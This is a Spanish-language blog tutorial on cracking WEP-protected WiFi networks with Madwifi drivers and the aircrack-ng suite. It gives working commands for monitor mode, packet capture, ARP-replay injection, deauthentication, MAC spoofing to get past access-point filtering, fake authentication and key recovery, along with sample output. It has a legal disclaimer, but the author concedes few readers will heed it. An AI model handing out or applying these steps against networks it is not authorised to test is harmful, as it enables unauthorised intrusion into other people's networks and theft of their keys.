Introduccin Primeros pasos (tarjetas compatibles) Instalar driver Madwifi Activar modo monitor Instalar aircrack-ng Crackeando redes

WEP Activar modo monitor Escanear redes y capturar paquetes Comprobar bloqueo MAC Inyeccin de paquetes (sin bloqueo MAC) Inyeccin de paquetes (con bloqueo MAC) Cambiar direccin MAC de la interfaz de red Autenticacin en el router Averiguando la clave con aircrack-ng Descarga de ficheros Pginas de referencia Hace poco me volv a interesar por este tema y me cost tanto lograrlo (lo hice posible entre 4 o 5 pginas distintas) que he decidido hacer una entrada reuniendo todos los pasos. Antes de continuar debis tener presente que esto es ilegal en la mayor parte de los pases as que si vais a hacer uso de ello deber ser sobre VUESTRA red WiFi. Dicho esto, que seguramente pocos haris caso alguno, procedamos a ello. Primeros pasos El primer paso ser averiguar si nuestra tarjeta WiFi permite que la activemos en modo monitor. El modo monitor nos permite hacer un tipo de ataque que reduce considerablemente el tiempo de obtencin de las claves (de unos das a unos minutos). No obstante, con cualquier tarjeta podis obtener claves, el problema es que con una tarjeta sin modo monitor tardaris das o semanas (o quizs nunca la consigis). En este enlace hay un buen listado de tarjetas inalmbricas dnde se nos indica cules estn preparadas para hacer inyeccin (modo monitor) y cules no. Si vuestra tarjeta est en esta lista y en la celda de Inyeccin pone Lx, premio! Vuestra tarjeta permite la inyeccin de trfico. Yo realizar las pruebas con una D-link DWL con chipset Atheros (cuesta unos 25 en cualquier tienda de informtica). Ahora que sabemos que nuestra tarjeta es compatible debemos instalar los drivers Madwifi para dicha tarjeta, ya que son los que nos permiten la inyeccin de trfico y el uso de la aplicacin aircrack-ng (la utilizada para averiguar las claves wifi). Antes de poder instalar estos drivers necesitis las herramientas de compilacin y las cabeceras necesarias de linux (sin ello la instalacin no se completara). As que accedemos a una terminal como administrador (tecleando su en ella) e instalamos las herramientas mencionadas: aptitude install build-essential linux-headers-$(uname -r) Instalar driver Madwifi Una vez instaladas las cabeceras procedemos a la instalacin de Madwifi. Para ello descarguemos la ltima versin de la web madwifi-project, actualmente la ltima versin (y la que estoy utilizando yo) es la siguiente: madwifi-hal-0.10.5.6-r3942-20090205.tar.gz Descargad el fichero en la carpeta /tmp/ (por ejemplo) y acceded a ella mediante consola para descomprimir e instalar el fichero: #ACCEDEMOS A LA CARPETA DONDE HEMOS DESCARGADO MADWIFI

cd /tmp/ #DESCOMPRIMIMOS MADWIFI tar -xvvzf madwifi-hal-0.10.5.6-r3942-20090205.tar.gz #ACCEDEMOS A LA CARPETA GENERADA cd madwifi-hal-0.10.5.6-r3942-20090205 #COMPILAMOS E INSTALAMOS make && make install Si estis reinstalando el driver recordad eliminar el anterior antes de hacer make && make install: rmmod -w ath_pci.ko Ahora que ya lo tenemos instalado debemos aadir el mdulo al kernel de linux: modprobe ath_pci Y para aadirlo siempre que arranque el sistema, lo aadimos en el fichero modules situado en la carpeta etc: echo ath_pci >> /etc/modules ste ltimo comando escribe ath_pci al final del fichero modules. Si ya habais instalado anteriormente Madwifi seguramente no sea necesario este paso (comprobad el contenido del fichero con cat /etc/modules). Instalar aircrack-ng Ya tenemos instalado Madwifi! Lo siguiente que haremos ser instalar aircrack-ng: aptitude -y install aircrack-ng Menuda complicacin, eh? Crackeando redes WEP Antes de continuar a delante quiero recordaros lo que ya he dicho al principio La mayora de pases no permiten hacer esto, as que si vais a hacerlo debe ser con consentimiento del dueo de la red que vayis a atacar. Activar modo monitor Ahora que ya tenemos todo lo necesario activaremos el modo monitor de nuestra tarjeta para poder hacer inyeccin de paquetes. Recordad que el ltimo paso que hicimos fue aadir el mdulo de la tarjeta al kernel de linux pero no hemos activado nuestra red. Comprobemos las redes que tenemos activas con ifconfig. Al hacerlo observaremos que tenemos una red wifi0 pero esto es un dispositivo virtual y no nos sirve, as que pondremos en marcha el dispositivo ath0: wlanconfig ath0 create wlandev wifi0 wlanmode sta Si al hacerlo recibs el siguiente error: wlanconfig: ioctl: Invalid argument Es porque ya tenis la red ath0 activada, pero para hacerla funcionar correctamente (solo para asegurarnos) haced lo siguiente: #LO DESTRUIMOS wlanconfig ath0 destroy #Y LO VOLVEMOS A CREAR EN MODO STANDALONE (wlanmode sta)

wlanconfig ath0 create wlandev wifi0 wlanmode sta S que parece algo estpido, pero sin hacer esto probablemente no funcionara correctamente (la primera vez, dado que hemos instalado los nuevos drivers sin destruir la conexin previamente). Bien, ahora deberais tener vuestra red wifi funcionando con normalidad y debis poder conectaros a una red si disponis de la contrasea. Pasemos pues a activar el modo monitor de una vez: #LO DESTRUIMOS wlanconfig ath0 destroy #Y LO VOLVEMOS A CREAR EN MODO STANDALONE (wlanmode sta) wlanconfig ath0 create wlandev wifi0 wlanmode monitor Ya la tenemos en modo monitor. Ahora aparentemente no funciona el wifi ya que si vamos a explorar redes con el applet de gnome no encuentra nada. Pero si no habis recibido error alguno es porque est activado y podis pasar al siguiente paso. Escanear redes y capturar paquetes Primero haremos un escaneo sin especificar canal ni nada, simplemente para ver en qu canal se encuentra nuestra red: airodump-ng ath0 La pantalla est dividida en dos partes importantes: la de AP (access points), en la parte superior y la de clientes, en la parte inferior. airodump-ng (clic para ampliar) Las cosas que ms nos interesan son BSSID (MAC del AP), PWR (potencia de la seal), #Data que nos dice el nmero de paquetes captados (paquetes que luego servirn para averiguar la contrasea, cuantos ms paquetes ms posibilidades de conseguirla), CH (canal), ENC (tipo de encriptacin que para seguir este tutorial debe ser WEP), ESSID (nombre de la red), STATION (usuarios conectados al AP). Mi red es la que tiene como nombre JAZZTEL_2C con BSSID 00:1A:23:14:23:3C y, evidentemente, esta es la que voy a atacar, as que empecemos capturando paquetes slo para esta red (lo que reducir el tamao del fichero generado): airodump-ng --channel 11 --bssid 00:1A:23:14:23:3C --write jazztel2c ath0 En negrita estn el canal y la BSSID respectivamente, que deberis cambiar a partir de los datos obtenidos vosotros de vuestra red. El parmetro write indica dnde el nombre del fichero en el que se guardarn los datos y ath0 es nuestra interfaz de red. Comprobar bloqueo MAC El siguiente paso ser comprobar si el punto de acceso tiene activada la restriccin MAC, para hacerlo utilizaremos aireplay-ng (en una nueva terminal, por supuesto): aireplay-ng -1 0 -e JAZZTEL_2C -a 00:1A:23:14:23:3C -h 00:11:22:33:44:55 ath0 El primer parmetro es el tipo de ataque (un nmero del 0 al 6), en este caso un uno, seguido del nmero de veces que se va a hacer (0 es la primera posicin, as que se repetir una nica vez). El parmetro -e es el nombre de la red, la -a su BSSID y la -h es una MAC inventada (ah la gracia, saber si nos permite conectarnos con una mac que no exista en su lista negra) y el ltimo parmetro es la interfaz de red que utilizaremos. Si el resultado es

16:35:29 16:35:29 16:35:29 16:35:29

Sending Authentication Request (Open System) [ACK] Authentication successful Sending Association Request [ACK] Association successful (AID: 1)

El filtro MAC est inhabilitado y podis pasar al paso Inyeccin de paquetes (sin bloqueo mac), sino saltad a Inyeccin de paquetes (con bloqueo mac). Inyeccin de paquetes (sin bloqueo mac) Vayamos al terminal donde tenemos airodump-ng funcionando (captando paquetes) y comprobemos si hay algn STATION asociado al BSSID de la red a atacar. Si es as copiad la MAC de la estacin y utilizadla en la siguiente orden: aireplay-ng -3 -b 00:1A:23:14:23:3C -h 00:16:CB:BA:23:D2 ath0 -3 es el tipo de ataque, -b la bssid a atacar, -h la MAC de la STATION y el ltimo parmetro es la interfaz de red. En caso de no disponer de un STATION debis poner vuestra MAC, para averiguarla podis mirarlo en vuestra tarjeta de red o bien con el comando: ifconfig ath0 | grep HWaddr Si os da vuestra direccin separada por guiones recordad ponerla separada por puntos y slo las 6 primeras parejas de nmeros. Hecho esto veris como aireplay-ng empieza a enviar paquetes al AP. Puede que pasen unos minutos hasta que los ARP empiezan a incrementar, pero llegado ese momento podris ver como los #Data de airodump-ng empiezan a subir rpidamente. Inyeccin de trfico con aireplay-ng Si estamos atacando utilizando la mac de un STATION en lugar de la nuestra, nos aparecer este error: The interface MAC (06:19:5B:C9:F2:4A) doesn't match the specified MAC (-h). ifconfig ath0 hw ether 00:16:CB:BA:23:D2 Esto es porque la mac que le hemos indicado no coincide con la de nuestra tarjeta de red. Para solucionar esto basta con cambiar la mac por la de la estacin que estemos emulando (utilizad control+C para terminar el proceso de aireplay-ng, cambiad la MAC y volved a ejecutar aireplay-ng). Para cambiar la MAC pasad al punto Cambiar direccin MAC de la interfaz de red . Inyeccin de paquetes (con bloqueo MAC) La opcin ms sencilla a la hora de inyectar paquetes en un AP con bloqueo MAC es hacerse pasar por uno de sus clientes. Para poder hacer esto tenemos que cambiar la direccin MAC, no obstante aireplay-ng tiene la posibilidad de atacar AP con bloqueo MAC (con este proceso no es necesario cambiar la MAC): aireplay-ng -0 5 -a 00:09:5B:D7:43:A8 -c 00:11:22:33:44:55 aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h 00:11:22:33:44:55 Es un proceso bastante ms lento que sin bloqueo de MAC, pero funciona igualmente. De todos modos si hay alguna estacin conectada al AP la mejor opcin es que cambiis vuestra MAC a la de dicha estacin.

Cambiar direccin MAC de la interfaz de red Para ello hay dos maneras de hacerlo, una de ellas nos la indicaba un error de unas lneas ms arriba: ifconfig ath0 hw ether 00:16:CB:BA:23:D2 La otra es utilizar macchanger: #INSTALAMOS MACCHANGER aptitude -y install macchanger #DESACTIVAMOS LA INTERFAZ DE RED ath0 ifconfig ath0 down #CAMBIAMOS LA MAC macchanger -m 00:16:CB:BA:23:D2 #REACTIVAMOS LA INTERFAZ DE RED ath0 ifconfig ath0 up Haciendo esto nos aseguramos que el AP crea que somos uno de sus clientes y facilitar la obtencin de paquetes ARP. aireplay-ng enviando paquetes Autenticacin en el router En ocasiones puede que se nos presente el siguiente error al ejecutar la inyeccin de trfico con aireplay-ng: Notice: got a deauth/disassoc packet. Is the source MAC associated ? Esto es debido a que no nos hemos identificado en el router y se da casi siempre que no hay una estacin conectada al AP. Podemos solucionarlo de dos formas: aireplay-ng -1 0 -e JAZZTEL_2C -a 00:1A:23:14:23:3C -h 00:16:CB:BA:23:D2 ath0 Que de ser ejecutado correctamente nos mostrar en pantalla: 18:18:20 Sending Authentication Request 18:18:20 Authentication successful 18:18:20 Sending Association Request 18:18:20 Association successful El otro mtodo es el que sigue: aireplay-ng -1 6000 -o 1 -q 10 -e JAZZTEL_2C -a 00:1A:23:14:23:3C -h 00:16:CB:BA:23:D2 ath0 Aqu estamos indicando que enve paquetes cada 6 segundos (en milisegundos) y que slo los enve en grupos de uno (-o 1) ya que muchos AP se confunden al mandarles muchos paquetes juntos (que es como acta por defecto). 18:19:20 Sending Authentication Request (Open System) [ACK] 18:19:20 Authentication successful 18:19:20 Sending Association Request [ACK] 18:19:20 Association successful (AID: 1) 18:19:42 Sending keep-alive packet [ACK] 18:19:55 Sending keep-alive packet [ACK]

Ambas son igualmente eficientes (quizs la primera sea un poco ms rpida, pero habr muchas ocasiones en que no podris utilizarla). Os recomiendo la segunda, ya que no paramos de autenticarnos en el router y no le damos pie a errores. Averiguando la clave con aircrack-ng Cuando el nmero de #Data est por encima de 30.000 podemos ir ejecutando aircrack-ng en una nueva terminal cargando el fichero que se va guardando (es decir, no paris la captura de paquetes con airodump, por si no tuvirais suficientes datos): aircrack-ng jazztel2c-01.cap Y.. presto! Ya tenemos nuestra clave: Contrasea desencriptada (clic para ampliar) Descarga de ficheros En caso de que no pudierais utilizar aptitude porque la mquina desde la cual queris hacer los ataques no tiene conexin a internet podis descargar todos los programas que he ido mencionando desde la pgina de paquetes de ubuntu: build-essential linux-headers aircrack-ng En el caso de los linux-headers debis descargar la versin correspondiente a vuestra versin de kernel. Para averiguarla podis hacerlo con uname: uname -r Recordad destruir la interfaz y reactivarla en modo standalone una vez tengis la contrasea para poderos conectar normalmente al AP. Pginas de referencia HOWTO: Aircrack-NG Howto get Madwifi-ng drivers to work properly!